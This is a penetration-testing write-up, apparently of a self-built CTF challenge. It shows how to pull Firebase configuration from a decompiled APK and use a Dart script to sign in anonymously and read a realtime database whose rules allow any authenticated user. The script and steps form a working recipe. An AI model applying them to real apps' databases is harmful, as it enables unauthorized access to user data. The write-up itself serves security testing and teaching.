Abusing Anonymous Login on Firebase
Through my path in cybersecurity and mobile penetration testing, Firebase is one of the things that is a must to check if it is configured in the mobile application which sometime can be abused.
Firebase is a platform developed by Google for creating mobile and web applications. It provides various services such as authentication, real-time databases, hosting, cloud storage, and more, making it easier for developers to build high-quality apps quickly.
We are going to talk about how to abuse real-time databases using anonymous login.
Anonymous auth in Firebase allows users to sign in to firebase applications using a temporary anonymous account. This feature is useful for applications that want to offer users a seamless experience without requiring them to create an account upfront but this feature can also be dangerous to the firebase and can be abused.
I have created a firebase project and set up a rule for the firebase real-time database.
{
"rules": {
".read":"auth.uid != null",
".write":false
}
}In this rule, users who are only are authenticated can read the database and write privileges on the real-time database is set to false which means none have write permissions on the real-time database.
After that, I have enabled anonymous login from the authentication.
From this firebase project, I have created a mobile application challenge previously with this firebase configuration.
Downloaded the APK on my kali machine and started by decompiling it.
After deompiling the APK, we will find the firebase configuration inside of res/values/strings.xml file.
These are the configuration that are needed to get make an anonymous authentication to the real-time database to read the database.
We can make use of these configurations and build dart project to make an anonymous login and read the database.
First we need to create a new dart project.
After creating our dart project, we need to download firebase_dart package, insert the package inside of pubspec.yaml and insert the command dart pub get in the terminal to download the package.
After downloading the package, created a dart code that will use the firebase configurations that have been retrived from the APK and make anonymous login to read the database.
In the dart code we need these configurations from the APK.
- firebase_database_url
- google_api_key
- google_app_id
- google_storage_bucket
- project_id
- authdomain (which is project_id with the domain firebaseapp.com)
import 'dart:convert';
import 'dart:io';
import 'dart:typed_data';
import 'package:firebase_dart/auth.dart';
import 'package:firebase_dart/core.dart';
import 'package:firebase_dart/database.dart';
import 'package:firebase_dart/implementation/pure_dart.dart';
import 'package:firebase_dart/storage.dart';
void main() async {
FirebaseDart.setup();
var options = FirebaseOptions(
appId: "1:945306155278:android:9a8149819a7989d29a7f5f",
apiKey: "AIzaSyBAkl5qQptzhYzIailgx6kIOI63p3cKGGo",
messagingSenderId: "",
authDomain: "tk-test-129ad-default-rtdb.firebaseapp.com",
databaseURL: "https://tk-test-129ad-default-rtdb.firebaseio.com",
storageBucket: "tk-test-129ad.appspot.com",
projectId: "tk-test-129ad"
);
var app = await Firebase.initializeApp(options: options);
var auth = FirebaseAuth.instanceFor(app: app);
await auth.signInAnonymously();
var database = FirebaseDatabase(app: app);
var dbRef = database.reference();
var snap = await dbRef.once();
print('Flag : ${snap.value}');
}After running the dart script we will get the flag from the real-time database.
Conclusion
Anonymous login can have significant security risks if not managed carefully and will lead attackers to abuse the firebase database by making anonymous login to read the database.
